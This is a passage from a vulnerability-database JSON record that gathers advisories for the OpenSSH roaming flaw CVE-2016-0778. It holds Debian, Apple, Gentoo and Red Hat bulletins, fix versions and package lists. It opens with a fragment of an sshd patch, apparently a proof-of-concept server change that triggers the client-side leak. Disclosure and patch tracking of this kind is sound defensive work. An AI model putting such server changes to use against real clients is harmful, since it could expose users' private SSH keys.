(strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t   rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription:  Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local user may be able to determine kernel memory layout\nDescription:  An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription:  Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription:  A code signing verification issue existed in dyld. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A remote attacker may be able to execute arbitrary code\nDescription:  Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local user may be able to cause a denial of service\nDescription:  A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to determine kernel memory layout\nDescription:  A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to determine kernel memory layout\nDescription:  An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to cause a denial of service\nDescription:  A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription:  A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription:  An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An application may be able to execute arbitrary code with\nkernel privileges\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription:  Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for:  OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact:  Multiple vulnerabilities in LibreSSL\nDescription:  Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A remote attacker may be able to cause a denial of service\nDescription:  A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription:  Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Clicking a tel link can make a call without prompting the\nuser\nDescription:  A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription:  An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  A local user may be able to check for the existence of\narbitrary files\nDescription:  A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription:  A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for:  \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription:  Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription:  A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for:  OS X El Capitan v10.11 to v10.11.3\nImpact:  An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription:  A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/openssh             \u003c 7.1_p2                  \u003e= 7.1_p2\n\nDescription\n===========\n\nQualys have reported two issues in the \"roaming\" code included in the\nOpenSSH client, which provides undocumented, experimental support for\nresuming SSH connections. Users with private keys that are not protected by a\npassphrase are advised to generate new keys if they have connected to\nan SSH server they don\u0027t fully trust. To do\nso, add \"UseRoaming no\" to the SSH client configuration, or specify \"-o\n\u0027UseRoaming no\u0027\" on the command line. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-7.1_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-0777\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777\n[ 2 ] CVE-2016-0778\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: openssh security update\nAdvisory ID:       RHSA-2016:0043-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-0043.html\nIssue date:        2016-01-14\nCVE Names:         CVE-2016-0777 CVE-2016-0778 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix two security issues are now available for\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. \nThese packages include the core files necessary for both the OpenSSH client\nand server. (CVE-2016-0778)\n\nRed Hat would like to thank Qualys for reporting these issues. \n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nppc64:\nopenssh-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-clients-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-6.6.1p1-23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0777\nhttps://access.redhat.com/security/cve/CVE-2016-0778\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/articles/2123781\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo\nnXgYWs8cZcyoTRVoriTGHQo=\n=1sk9\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      },
      {
        "db": "CERT/CC",
        "id": "VU#456088"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "BID",
        "id": "80698"
      },
      {
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "db": "PACKETSTORM",
        "id": "135250"
      },
      {
        "db": "PACKETSTORM",
        "id": "135273"
      },
      {
        "db": "PACKETSTORM",
        "id": "135259"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "135283"
      },
      {
        "db": "PACKETSTORM",
        "id": "135263"
      }
    ],
    "trust": 3.33
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-0778",
        "trust": 4.3
      },
      {
        "db": "BID",
        "id": "80698",
        "trust": 2.1
      },
      {
        "db": "JUNIPER",
        "id": "JSA10734",
        "trust": 2.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#456088",
        "trust": 2.0
      },
      {
        "db": "PACKETSTORM",
        "id": "135273",
        "trust": 1.9
      },
      {
        "db": "SECTRACK",
        "id": "1034671",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/01/14/7",
        "trust": 1.8
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.8
      },
      {
        "db": "JVN",
        "id": "JVNVU95595627",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU97668313",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250",
        "trust": 0.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10774",
        "trust": 0.3
      },
      {
        "db": "SEEBUG",
